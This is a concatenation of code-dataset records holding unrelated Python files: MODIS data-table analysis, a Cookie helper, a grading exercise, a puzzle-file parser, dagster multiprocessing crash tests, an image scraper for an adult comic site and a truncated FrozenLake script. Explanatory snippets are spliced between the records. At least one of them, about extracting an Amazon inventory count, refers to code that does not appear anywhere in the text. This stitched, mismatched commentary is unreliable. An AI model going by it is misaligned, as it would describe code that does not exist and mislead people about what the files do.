'{:d}N'.format(int(lat))\n\ndef load_modis_tbl(table:str=None, \n local=False, cuts:str=None, \n region:str=None, percentiles:list=None):\n \"\"\"Load up the MODIS table and (usually) cut it down\n\n Args:\n table (str, optional): Code for the table name. Defaults to None.\n std, CF, CF_DT0, ...\n local (bool, optional): Load file on local harddrive?. Defaults to False.\n cuts (str, optional): Named cuts. Defaults to None.\n inliers: Restrict to LL = [200,400]\n region (str, optional): Cut on geographic region. Defaults to None.\n Brazil, GS, Med\n percentiles (list, optional): Cut on percentiles of LL. 
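The inventory count above is pulled out of the cart message with two chained `split()` calls; an equivalent regex is more tolerant of spacing (toy message; the live Amazon wording may differ):

```python
import re

msg = "This seller has only 47 of these available."
m = re.search(r"only\s+(\d+)\s+of", msg)
print(int(m.group(1)) if m else None)  # 47
```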
Defaults to None.\n\n Raises:\n IOError: _description_\n\n Returns:\n pandas.Dataframe: MODIS table\n \"\"\"\n\n # Which file?\n if table is None:\n table = '96' \n if table == 'std': # Original; too many clouds\n basename = 'MODIS_L2_std.parquet'\n else:\n # Base 1\n if 'CF' in table:\n base1 = 'MODIS_SSL_cloud_free'\n elif '96_v4' in table:\n base1 = 'MODIS_SSL_v4'\n elif '96' in table:\n base1 = 'MODIS_SSL_96clear'\n # DT\n if 'DT' in table:\n if 'v4' in table:\n base1 = 'MODIS_SSL_96clear_v4'\n dtstr = table.split('_')[-1]\n base2 = '_'+dtstr\n elif 'v4_a' in table:\n base1 = 'MODIS_SSL_96clear_v4'\n dtstr = table.split('_')[-1]\n base2 = '_'+dtstr\n else:\n base2 = ''\n # \n basename = base1+base2+'.parquet'\n\n if local:\n tbl_file = os.path.join(os.getenv('OS_SST'), \n 'MODIS_L2', 'Nenya',\n 'Tables', basename)\n else:\n tbl_file = 's3://modis-l2/Tables/'+basename\n\n # Load\n modis_tbl = ulmo_io.load_main_table(tbl_file)\n\n # DT\n if 'DT' not in modis_tbl.keys():\n modis_tbl['DT'] = modis_tbl.T90 - modis_tbl.T10\n modis_tbl['logDT'] = np.log10(modis_tbl.DT)\n modis_tbl['lowDT'] = modis_tbl.mean_temperature - modis_tbl.T10\n modis_tbl['absDT'] = np.abs(modis_tbl.T90) - np.abs(modis_tbl.T10)\n\n # Slopes\n modis_tbl['min_slope'] = np.minimum(\n modis_tbl.zonal_slope, modis_tbl.merid_slope)\n\n # Cut\n goodLL = np.isfinite(modis_tbl.LL)\n if cuts is None:\n good = goodLL\n elif cuts == 'inliers':\n inliers = (modis_tbl.LL > 200.) & (modis_tbl.LL < 400)\n good = goodLL & inliers\n modis_tbl = modis_tbl[good].copy()\n\n # Region?\n if region is None:\n pass\n elif region == 'brazil':\n # Brazil\n in_brazil = ((np.abs(modis_tbl.lon.values + 57.5) < 10.) & \n (np.abs(modis_tbl.lat.values + 43.0) < 10))\n in_DT = np.abs(modis_tbl.DT - 2.05) < 0.05\n modis_tbl = modis_tbl[in_brazil & in_DT].copy()\n elif region == 'GS':\n # Gulf Stream\n in_GS = ((np.abs(modis_tbl.lon.values + 69.) < 3.) & \n (np.abs(modis_tbl.lat.values - 39.0) < 1))\n modis_tbl = modis_tbl[in_GS].copy()\n elif region == 'Med':\n # Mediterranean\n in_Med = ((modis_tbl.lon > -5.) & (modis_tbl.lon < 30.) &\n (np.abs(modis_tbl.lat.values - 36.0) < 5))\n modis_tbl = modis_tbl[in_Med].copy()\n else: \n raise IOError(f\"Bad region! 
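The region cuts above are plain boolean masks over the lon/lat columns; the Gulf Stream box in isolation, on fabricated coordinates:

```python
# Toy version of the geographic box cut used for region='GS'.
import numpy as np
import pandas as pd

tbl = pd.DataFrame({"lon": [-70.0, -40.0, -68.5], "lat": [39.5, 10.0, 38.7]})
in_GS = (np.abs(tbl.lon + 69.0) < 3.0) & (np.abs(tbl.lat - 39.0) < 1.0)
print(tbl[in_GS])  # keeps the two points near 69W, 39N
```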
{region}\")\n\n # Percentiles\n if percentiles is not None:\n LL_p = np.percentile(modis_tbl.LL, percentiles)\n cut_p = (modis_tbl.LL < LL_p[0]) | (modis_tbl.LL > LL_p[1])\n modis_tbl = modis_tbl[cut_p].copy()\n\n return modis_tbl\n\ndef grab_subset(DT:float):\n raise ValueError(\"Deal with DT40\")\n for key, item in ssl_defs.umap_DT.items():\n if item is None:\n raise ValueError(\"Should not get to all!!\")\n if item[1] < 0:\n DTmin = item[0]\n DTmax = 1e9\n else:\n DTmin = item[0] - item[1]\n DTmax = item[0] + item[1]\n #\n if (DT >= DTmin) & (DT < DTmax):\n break\n\n # Return\n return key\n\ndef time_series(df, metric, show=False):\n # Dummy variables for seasonal\n dummy = np.zeros((len(df), 11), dtype=int)\n for i in np.arange(11):\n for j in np.arange(len(df)):\n if df.month.values[j] == i+1:\n dummy[j,i] = 1\n\n # Setup\n time = np.arange(len(df)) + 1\n\n # Repack\n data = pandas.DataFrame()\n data['fitme'] = df[metric].values\n data['time'] = time\n dummies = []\n for idum in np.arange(11):\n key = f'dum{idum}'\n dummies.append(key)\n data[key] = dummy[:,idum]\n\n # Cut Nan\n keep = np.isfinite(df[metric].values)\n data = data[keep].copy()\n\n # Fit\n formula = \"fitme ~ dum0 + dum1 + dum2 + dum3 + dum4 + dum5 + dum6 + dum7 + dum8 + dum9 + dum10 + time\"\n glm_model = smf.glm(formula=formula, data=data).fit()#, family=sm.families.Binomial()).fit()\n\n # Summary\n glm_model.summary()\n\n # Show?\n if show:\n plt.clf()\n fig = plt.figure(figsize=(12,8))\n #\n ax = plt.gca()\n ax.plot(data['time'], data['values'], 'o', ms=2)\n # Fit\n ax.plot(data['time'], glm_model.fittedvalues)\n #\n plt.show()\n\n # Build some useful stuff\n\n # Inter-annual fit\n xval = np.arange(len(df))\n result_dict = {}\n result_dict['slope'] = glm_model.params['time']\n result_dict['slope_err'] = np.sqrt(\n glm_model.cov_params()['time']['time'])\n\n\n seas = []\n seas_err = []\n for idum in np.arange(11):\n key = f'dum{idum}'\n # Value\n seas.append(glm_model.params[key])\n # Error\n seas_err.append(np.sqrt(\n glm_model.cov_params()[key][key]))\n\n # Add em all up\n yval = glm_model.params['Intercept'] + xval * glm_model.params['time'] + (\n np.mean(seas))\n result_dict['trend_yvals'] = yval\n\n # Add one more\n seas.append(0.)\n seas_err.append(0.)\n result_dict['seasonal'] = seas\n result_dict['seasonal_err'] = seas_err\n\n # Return\n return glm_model, result_dict\n\ndef gen_umap_keys(umap_dim:int, umap_comp:str):\n \"\"\" Generate the keys for UMAP \n\n Args:\n umap_dim (int): dimension of UMAP\n umap_comp (str): \n\n Returns:\n umap_keys (tuple): tuple of keys for UMAP\n \"\"\"\n if umap_dim == 2:\n if 'T1' in umap_comp:\n umap_keys = ('UT1_'+umap_comp[0], 'UT1_'+umap_comp[-1])\n else:\n ps = umap_comp.split(',')\n umap_keys = ('U'+ps[0], 'U'+ps[-1])\n elif umap_dim == 3:\n umap_keys = ('U3_'+umap_comp[0], 'U3_'+umap_comp[-1])\n return umap_keys\n\n","sub_path":"papers/Nenya/Analysis/py/ssl_paper_analy.py","file_name":"ssl_paper_analy.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423881863","text":"from datetime import datetime\nfrom http.cookies import SimpleCookie\nfrom typing import Optional, List\n\n\nclass Cookie:\n def __init__(\n self,\n name: str,\n value: str,\n path: Optional[str] = None,\n domain: Optional[str] = None,\n expires: Optional[datetime] = None,\n ):\n self.name = name\n self.value = value\n self.path = path\n self.domain = domain\n self.expires = expires\n\n cookie: SimpleCookie 
= SimpleCookie()\n cookie[name] = str(value)\n if domain:\n cookie[name][\"domain\"] = domain\n if path:\n cookie[name][\"path\"] = path\n if expires:\n cookie[name][\"expires\"] = expires.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n self.cookie = cookie\n\n def __str__(self) -> str:\n return str(self.cookie)\n\n def header(self) -> List[str]:\n return [part.strip() for part in str(self).split(\":\", 1)]\n\n\n__all__ = [\"Cookie\"]\n","sub_path":"chocs/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599107103","text":"# Ask the user for their grades.\ngeometry = input(\"Grade for Geometry: \")\nalgebra = input(\"Grade for Algebra: \")\nphysics = input(\"Grade for Physics: \")\n\n# We need them as numbers, not as strings.\ngeometry = int(geometry)\nalgebra = int(algebra)\nphysics = int(physics)\n\n# Add everything together and divide by 3 to get the average.\naverage = (geometry + algebra + physics) / 3\n\n# Another possible solution using a list:\n# grades = [geometry, algebra, physics]\n# average = sum(grades) / len(grades)\n\nprint(\"Your average: \" + str(average))\n\n# Encourage the student to work harder.\nif average >= 7:\n print(\"Good job!\")\nelif 4 < average < 7:\n print(\"You need to work a little harder.\")\nelse:\n print(\"You need to work a lot harder.\")\n","sub_path":"Solutions/ex9.py","file_name":"ex9.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541090366","text":"#!/usr/bin/env python3\n#récupére le fichier en paramètre et en extrait la grille de taquin a resoudre\n\nimport sys\n\ndef clean_comment(line):\n if '#' in line: # Nettoyage des potentiels commentaires :\n line = line[:line.index(\"#\")]\n #if line[-1::] in \" \\n\": # suppresion d'un eventuel \\n ou d'un espace vide en fin de ligne créé par la supression précédente d'un commentaire\n # line = line[:-1:]\n return line.strip()\n\ndef check_data_in_line(line, size, nb_of_piece, list_of_my_valid_number):\n intLine = []\n if not len(line) == size:\n print(\"Error : A number is mising in one line\")\n exit()\n for nb in line:\n if not nb.isdigit():\n print(\"Error : One data is not a number\")\n exit()\n j = int(nb)\n if not 0 <= j < nb_of_piece:\n print(\"Error : One number is not valid : \" + str(j))\n exit()\n elif j in list_of_my_valid_number:\n print(\"Error : One number is duplicated\")\n exit()\n else:\n list_of_my_valid_number.append(j)\n intLine.append(j)\n return list_of_my_valid_number, intLine\n\n\ndef parser() :\n first = True\n list_of_my_valid_number = []\n nb_of_piece = 0\n grid = []\n size_of_grid = 0\n if len(sys.argv) == 2:\n filename = sys.argv[1]\n else:\n print (\"Error : please give one filename in argv\")\n exit()\n try:\n file = open(filename, \"r\")\n except Exception:\n print(\"Error : filename is not valid\")\n exit()\n file = file.read()\n file = file.split(\"\\n\")\n #check des données lignes par lignes et enregistrement de la grille\n for line in file:\n line = clean_comment(line)\n size = len(line)\n if size == 0 : #si la ligne ne contenait qu'un commentaire ou etait vide on passe à la suivante\n continue\n elif line.isdigit() and first: #si la ligne est digit c'est qu'elle ne contient qu'un nb et si c'est pour la première fois, alors il s'agit de la taille du tableau\n size_of_grid = int(line)\n nb_of_piece = size_of_grid * size_of_grid\n first = False\n 
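`header()` above splits the `SimpleCookie` rendering into a (name, value) pair for an HTTP response; the stdlib behaviour it relies on, in isolation:

```python
from http.cookies import SimpleCookie

c = SimpleCookie()
c["session"] = "abc123"
c["session"]["path"] = "/"
name, value = [part.strip() for part in str(c).split(":", 1)]
print(name, "|", value)  # Set-Cookie | session=abc123; Path=/
```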
if (size_of_grid < 3):\n print(\"Error : the size of the grid is too small\")\n exit()\n elif not first:\n list_of_my_valid_number, intLine = check_data_in_line(line.split(), size_of_grid, nb_of_piece, list_of_my_valid_number)\n grid.append(intLine)\n else:\n print(\"Error : One line is not a number or a comment\")\n exit()\n if not len(grid) == size_of_grid or size_of_grid < 3:\n print(\"Error : One line is missing\")\n exit()\n print(\"\\n\\033[1;36m\\nVous souhaitez résoudre la grille de taille \" + str(size_of_grid) + \" suivante :\\033[m\\nSTART: \" + str(grid))\n return size_of_grid, grid\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390998381","text":"import os\nimport sys\nimport time\n\nimport pytest\n\nfrom dagster import (\n EventMetadataEntry,\n Failure,\n Field,\n InputDefinition,\n Nothing,\n Output,\n OutputDefinition,\n PresetDefinition,\n String,\n execute_pipeline,\n lambda_solid,\n pipeline,\n reconstructable,\n solid,\n)\nfrom dagster.core.instance import DagsterInstance\nfrom dagster.core.storage.compute_log_manager import ComputeIOType\nfrom dagster.utils import safe_tempfile_path, segfault\n\n\ndef test_diamond_simple_execution():\n result = execute_pipeline(define_diamond_pipeline())\n assert result.success\n assert result.result_for_solid('adder').output_value() == 11\n\n\ndef compute_event(result, solid_name):\n return result.result_for_solid(solid_name).compute_step_events[0]\n\n\ndef test_diamond_multi_execution():\n pipe = reconstructable(define_diamond_pipeline)\n result = execute_pipeline(\n pipe,\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n )\n assert result.success\n\n assert result.result_for_solid('adder').output_value() == 11\n\n # https://github.com/dagster-io/dagster/issues/1875\n # pids_by_solid = {}\n # for solid in pipeline.solids:\n # pids_by_solid[solid.name] = compute_event(result, solid.name).logging_tags['pid']\n\n # # guarantee that all solids ran in their own process\n # assert len(set(pids_by_solid.values())) == len(pipeline.solids)\n\n\ndef define_diamond_pipeline():\n @lambda_solid\n def return_two():\n return 2\n\n @lambda_solid(input_defs=[InputDefinition('num')])\n def add_three(num):\n return num + 3\n\n @lambda_solid(input_defs=[InputDefinition('num')])\n def mult_three(num):\n return num * 3\n\n @lambda_solid(input_defs=[InputDefinition('left'), InputDefinition('right')])\n def adder(left, right):\n return left + right\n\n @pipeline(\n preset_defs=[\n PresetDefinition(\n 'just_adder',\n {\n 'storage': {'filesystem': {}},\n 'execution': {'multiprocess': {}},\n 'solids': {'adder': {'inputs': {'left': {'value': 1}, 'right': {'value': 1}}}},\n },\n solid_selection=['adder'],\n )\n ],\n )\n def diamond_pipeline():\n two = return_two()\n adder(left=add_three(two), right=mult_three(two))\n\n return diamond_pipeline\n\n\ndef define_error_pipeline():\n @lambda_solid\n def should_never_execute(_x):\n assert False # this should never execute\n\n @lambda_solid\n def throw_error():\n raise Exception('bad programmer')\n\n @pipeline\n def error_pipeline():\n should_never_execute(throw_error())\n\n return error_pipeline\n\n\ndef test_error_pipeline():\n pipe = define_error_pipeline()\n result = execute_pipeline(pipe, raise_on_error=False)\n assert not result.success\n\n\ndef test_error_pipeline_multiprocess():\n result = 
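`check_data_in_line` above tracks seen tiles in a list, making each duplicate test O(n); a set keeps the same checks constant-time (sketch with hypothetical names; valid tiles for an n×n taquin are 0 .. n²−1):

```python
def validate_row(tokens, n, seen):
    row = []
    for tok in tokens:
        if not tok.isdigit():
            raise ValueError(f"not a number: {tok!r}")
        v = int(tok)
        if not 0 <= v < n * n or v in seen:   # range check + O(1) duplicate check
            raise ValueError(f"invalid or duplicated tile: {v}")
        seen.add(v)
        row.append(v)
    return row

seen = set()
print(validate_row("0 1 2".split(), 3, seen))  # [0, 1, 2]
```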
execute_pipeline(\n reconstructable(define_error_pipeline),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n )\n assert not result.success\n\n\ndef test_mem_storage_error_pipeline_multiprocess():\n result = execute_pipeline(\n reconstructable(define_diamond_pipeline),\n run_config={'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n raise_on_error=False,\n )\n assert not result.success\n assert len(result.event_list) == 1\n assert result.event_list[0].is_failure\n\n\ndef test_invalid_instance():\n result = execute_pipeline(\n reconstructable(define_diamond_pipeline),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.ephemeral(),\n raise_on_error=False,\n )\n assert not result.success\n assert len(result.event_list) == 1\n assert result.event_list[0].is_failure\n assert (\n result.event_list[0].pipeline_init_failure_data.error.cls_name\n == 'DagsterUnmetExecutorRequirementsError'\n )\n assert 'non-ephemeral instance' in result.event_list[0].pipeline_init_failure_data.error.message\n\n\ndef test_no_handle():\n result = execute_pipeline(\n define_diamond_pipeline(),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.ephemeral(),\n raise_on_error=False,\n )\n assert not result.success\n assert len(result.event_list) == 1\n assert result.event_list[0].is_failure\n assert (\n result.event_list[0].pipeline_init_failure_data.error.cls_name\n == 'DagsterUnmetExecutorRequirementsError'\n )\n assert 'is not reconstructable' in result.event_list[0].pipeline_init_failure_data.error.message\n\n\ndef test_solid_selection():\n pipe = reconstructable(define_diamond_pipeline)\n\n result = execute_pipeline(pipe, preset='just_adder', instance=DagsterInstance.local_temp())\n\n assert result.success\n\n assert result.result_for_solid('adder').output_value() == 2\n\n\ndef define_subdag_pipeline():\n @solid(config_schema=Field(String))\n def waiter(context):\n done = False\n while not done:\n time.sleep(0.15)\n if os.path.isfile(context.solid_config):\n return\n\n @solid(\n input_defs=[InputDefinition('after', Nothing)], config_schema=Field(String),\n )\n def writer(context):\n with open(context.solid_config, 'w') as fd:\n fd.write('1')\n return\n\n @lambda_solid(\n input_defs=[InputDefinition('after', Nothing)], output_def=OutputDefinition(Nothing),\n )\n def noop():\n pass\n\n @pipeline\n def separate():\n waiter()\n a = noop.alias('noop_1')()\n b = noop.alias('noop_2')(a)\n c = noop.alias('noop_3')(b)\n writer(c)\n\n return separate\n\n\ndef test_separate_sub_dags():\n pipe = reconstructable(define_subdag_pipeline)\n\n with safe_tempfile_path() as filename:\n result = execute_pipeline(\n pipe,\n run_config={\n 'storage': {'filesystem': {}},\n 'execution': {'multiprocess': {'config': {'max_concurrent': 2}}},\n 'solids': {'waiter': {'config': filename}, 'writer': {'config': filename},},\n },\n instance=DagsterInstance.local_temp(),\n )\n\n assert result.success\n\n # this test is to ensure that the chain of noop -> noop -> noop -> writer is not blocked by waiter\n order = [str(event.solid_handle) for event in result.step_event_list if event.is_step_success]\n\n # the writer and waiter my finish in different orders so just ensure the proceeding chain\n assert order[0:3] == ['noop_1', 'noop_2', 'noop_3']\n\n\ndef test_ephemeral_event_log():\n pipe = reconstructable(define_diamond_pipeline)\n # 
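The waiter/writer solids above coordinate through a file created on disk; the same handshake, dependency-free, with threads standing in for the two solids (temp path illustrative):

```python
import os
import tempfile
import threading
import time

flag = os.path.join(tempfile.gettempdir(), "subdag_demo_flag")

def waiter():
    while not os.path.isfile(flag):  # poll until the writer creates the file
        time.sleep(0.05)
    print("waiter released")

t = threading.Thread(target=waiter)
t.start()
time.sleep(0.2)
with open(flag, "w") as fd:          # the "writer" step
    fd.write("1")
t.join()
os.remove(flag)
```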
override event log to in memory\n instance = DagsterInstance.local_temp(\n overrides={\n 'event_log_storage': {\n 'module': 'dagster.core.storage.event_log',\n 'class': 'InMemoryEventLogStorage',\n }\n }\n )\n\n result = execute_pipeline(\n pipe,\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=instance,\n )\n assert result.success\n\n assert result.result_for_solid('adder').output_value() == 11\n\n\n@solid(\n output_defs=[\n OutputDefinition(name='option_1', is_required=False),\n OutputDefinition(name='option_2', is_required=False),\n ]\n)\ndef either_or(_context):\n yield Output(1, 'option_1')\n\n\n@lambda_solid\ndef echo(x):\n return x\n\n\n@pipeline\ndef optional_stuff():\n option_1, option_2 = either_or()\n echo(echo(option_1))\n echo(echo(option_2))\n\n\ndef test_optional_outputs():\n single_result = execute_pipeline(optional_stuff)\n assert single_result.success\n assert not [event for event in single_result.step_event_list if event.is_step_failure]\n assert len([event for event in single_result.step_event_list if event.is_step_skipped]) == 2\n\n multi_result = execute_pipeline(\n reconstructable(optional_stuff),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n )\n assert multi_result.success\n assert not [event for event in multi_result.step_event_list if event.is_step_failure]\n assert len([event for event in multi_result.step_event_list if event.is_step_skipped]) == 2\n\n\n@lambda_solid\ndef throw():\n raise Failure(\n description='it Failure',\n metadata_entries=[\n EventMetadataEntry.text(label='label', text='text', description='description')\n ],\n )\n\n\n@pipeline\ndef failure():\n throw()\n\n\ndef test_failure_multiprocessing():\n result = execute_pipeline(\n reconstructable(failure),\n run_config={'execution': {'multiprocess': {}}, 'storage': {'filesystem': {}}},\n instance=DagsterInstance.local_temp(),\n raise_on_error=False,\n )\n assert not result.success\n failure_data = result.result_for_solid('throw').failure_data\n assert failure_data\n assert failure_data.error.cls_name == 'Failure'\n\n # hard coded\n assert failure_data.user_failure_data.label == 'intentional-failure'\n # from Failure\n assert failure_data.user_failure_data.description == 'it Failure'\n assert failure_data.user_failure_data.metadata_entries[0].label == 'label'\n assert failure_data.user_failure_data.metadata_entries[0].entry_data.text == 'text'\n assert failure_data.user_failure_data.metadata_entries[0].description == 'description'\n\n\n@solid\ndef sys_exit(context):\n context.log.info('Informational message')\n print('Crashy output to stdout') # pylint: disable=print-call\n sys.exit('Crashy output to stderr')\n\n\n@pipeline\ndef sys_exit_pipeline():\n sys_exit()\n\n\n@pytest.mark.skipif(os.name == 'nt', reason=\"Different crash output on Windows: See issue #2791\")\ndef test_crash_multiprocessing():\n instance = DagsterInstance.local_temp()\n result = execute_pipeline(\n reconstructable(sys_exit_pipeline),\n run_config={'execution': {'multiprocess': {}}, 'storage': {'filesystem': {}}},\n instance=instance,\n raise_on_error=False,\n )\n assert not result.success\n failure_data = result.result_for_solid('sys_exit').failure_data\n assert failure_data\n assert failure_data.error.cls_name == 'ChildProcessCrashException'\n\n assert failure_data.user_failure_data is None\n\n assert (\n 'Crashy output to stdout'\n in instance.compute_log_manager.read_logs_file(\n result.run_id, 
'sys_exit.compute', ComputeIOType.STDOUT\n ).data\n )\n\n # The argument to sys.exit won't (reliably) make it to the compute logs for stderr b/c the\n # LocalComputeLogManger is in-process -- documenting this behavior here though we may want to\n # change it\n\n # assert (\n # 'Crashy output to stderr'\n # not in instance.compute_log_manager.read_logs_file(\n # result.run_id, 'sys_exit.compute', ComputeIOType.STDERR\n # ).data\n # )\n\n\n# segfault test\n@solid\ndef segfault_solid(context):\n context.log.info('Informational message')\n print('Crashy output to stdout') # pylint: disable=print-call\n segfault()\n\n\n@pipeline\ndef segfault_pipeline():\n segfault_solid()\n\n\n@pytest.mark.skipif(os.name == 'nt', reason=\"Different exception on Windows: See issue #2791\")\ndef test_crash_hard_multiprocessing():\n instance = DagsterInstance.local_temp()\n result = execute_pipeline(\n reconstructable(segfault_pipeline),\n run_config={'execution': {'multiprocess': {}}, 'storage': {'filesystem': {}}},\n instance=instance,\n raise_on_error=False,\n )\n assert not result.success\n failure_data = result.result_for_solid('segfault_solid').failure_data\n assert failure_data\n assert failure_data.error.cls_name == 'ChildProcessCrashException'\n\n assert failure_data.user_failure_data is None\n\n # Neither the stderr not the stdout spew will (reliably) make it to the compute logs --\n # documenting this behavior here though we may want to change it\n\n # assert (\n # 'Crashy output to stdout'\n # not in instance.compute_log_manager.read_logs_file(\n # result.run_id, 'segfault_solid.compute', ComputeIOType.STDOUT\n # ).data\n # )\n\n # assert (\n # instance.compute_log_manager.read_logs_file(\n # result.run_id, 'sys_exit.compute', ComputeIOType.STDERR\n # ).data\n # is None\n # )\n","sub_path":"python_modules/dagster/dagster_tests/core_tests/engine_tests/test_multiprocessing.py","file_name":"test_multiprocessing.py","file_ext":"py","file_size_in_byte":12690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424530650","text":"#!usr/bin/python\n# coding: utf-8\nimport shutil\nimport unittest\nfrom bs4 import BeautifulSoup\nfrom requests.adapters import HTTPAdapter\nimport requests\nimport os\nimport zipfile\nimport shutil\nimport argparse\n\nfrom urllib3 import Retry\n\nPATH = lambda p: os.path.abspath(os.path.join(os.path.dirname(__file__), p))\n\n\ndef check_and_mkdir(folder_name):\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n\n\ndef download_image(link, filename):\n try:\n\n headers = {'Referer': 'https://18comic.org/photo/{0}/'.format(cid),\n 'Sec-Fetch-Mode': 'no-cors',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'\n }\n\n requests.adapters.DEFAULT_RETRIES = 5 # 增加重连次数\n\n s = requests.session()\n\n s.keep_alive = False # 关闭多余连接\n\n retry = Retry(connect=5, backoff_factor=1)\n\n adapter = HTTPAdapter(max_retries=retry)\n\n s.mount('http://', adapter)\n\n s.mount('https://', adapter)\n\n response = s.get(link, stream=True, headers=headers)\n\n with open('{0}'.format(filename), 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n except Exception as msg:\n print(msg)\n\n\nif __name__ == '__main__':\n\n # 直接从命令行中获取漫画的CID\n # 注意如果没有分页, 直接把CID作为参数传入 比如 python WebCrawler-Comic.py 122020\n # 如果有分页, 就需要把CID之后整个字符串传入, 比如 python WebCrawler-Comic.py 122020/?page=2\n parser = argparse.ArgumentParser(description='Please input 
cid.')\n parser.add_argument('cid', metavar='N', type=str, help='cid of the 18comic alarm')\n args = parser.parse_args()\n\n if args.cid:\n cid = args.cid\n\n # title = '[苦渡众生汉化组] (C80) [クリムゾン] 停波総集編 (ファイナルファンタジーVII)'\n\n requests.adapters.DEFAULT_RETRIES = 5 # 增加重连次数\n\n s = requests.session()\n\n s.keep_alive = False # 关闭多余连接\n\n retry = Retry(connect=5, backoff_factor=1)\n\n adapter = HTTPAdapter(max_retries=retry)\n\n s.mount('http://', adapter)\n\n s.mount('https://', adapter)\n\n headers = {'authority': '18comic.org',\n 'method': 'GET',\n 'path': '/photo/{0}/'.format(cid),\n 'scheme': 'https',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,'\n 'image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'}\n\n # 由于有些漫画太长造成了分页, CID会加上分布的页号如下, 所以需要判断CID中是否有分页\n # html = s.get(\"https://18comic.org/photo/122020/?page=2\", headers=headers)\n if \"page=\" in cid:\n html = s.get(\"https://18comic.org/photo/{0}\".format(cid), headers=headers)\n else:\n html = s.get(\"https://18comic.org/photo/{0}/\".format(cid), headers=headers)\n\n url = \"https://18comic.org\"\n\n # 创建 Beautiful Soup 对象\n bs = BeautifulSoup(html.text, 'html5lib')\n\n web_title = ''.join(bs.title.text.split())\n web_title = web_title.split(\"|\")[0]\n print(web_title)\n folder_dir = './{0}'.format(\"{0}\".format(web_title))\n check_and_mkdir(folder_dir)\n\n # 从得到的HTML页面中解析图片连接\n print(\"Searching images...\")\n img_with_class = bs.select('img.lazy_img')\n\n # 下载所有图片\n for i in img_with_class:\n if i.attrs.get('data-original'):\n url2 = i.attrs.get('data-original')\n else:\n url2 = i.attrs.get('src')\n if url2 is not None:\n filename = url2.split('/')[-1]\n # 因为有些预览图是带'x'的, 而我们又不需要, 所以跳过这种图片\n if 'x' not in filename:\n print(\"Downloading pic {0}\".format(filename))\n # download_image(url + url2, folder_dir + '/' + filename)\n download_image(url2, folder_dir + '/' + filename)\n else:\n continue\n\n # 将下载的目录打包方便传输\n print(\"Zipping\")\n\n # 同样为分页做准备, 有分页的就在文件名后面加上分页的页号\n if \"page=\" in cid:\n cid_f = cid.split(\"/?page=\")[0]\n cid_e = cid.split(\"/?page=\")[1]\n cid = cid_f + \"_\" + cid_e\n z = zipfile.ZipFile(cid + '.zip', 'w')\n if os.path.isdir(folder_dir):\n for d in os.listdir(folder_dir):\n z.write(folder_dir+os.sep+d)\n # close() 是必须调用的!\n z.close()\n\n print(\"Removing folder\")\n shutil.rmtree(folder_dir)\n","sub_path":"WebCrawler/WebCrawler-Comic.py","file_name":"WebCrawler-Comic.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270386334","text":"from os import system, name\nimport time\nimport gym\nimport numpy as np\nenv = gym.make('FrozenLake-v0')\nenv.reset()\n\ndef clear():\n if name == 'nt': \n _ = system('cls') \n else: \n _ = system('clear') \n\ndef act(V, env, gamma, policy, state, v):\n for action, action_prob in enumerate(policy[state]): \n for state_prob, next_state, reward, end in env.P[state][action]: \n v += action_prob * state_prob * (reward + gamma * V[next_state]) \n V[state] = v\n \ndef evaluate(V, action_values, env, gamma, state):\n for action in range(env.nA):\n for prob, next_state, reward, terminated in env.P[state][action]:\n action_values[action] += prob * (reward + gamma * V[next_state])\n return action_values\n\ndef lookahead(env, state, V, gamma):\n action_values = np.zeros(env.nA)\n return evaluate(V, action_values, env, 
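The crawler above mounts the same retry adapter inline in two places; the pattern isolated (requests + urllib3, matching the imports above):

```python
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

s = requests.Session()
adapter = HTTPAdapter(max_retries=Retry(connect=5, backoff_factor=1))
s.mount("http://", adapter)
s.mount("https://", adapter)
# s.get(...) now retries failed connection attempts with exponentially growing backoff
```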
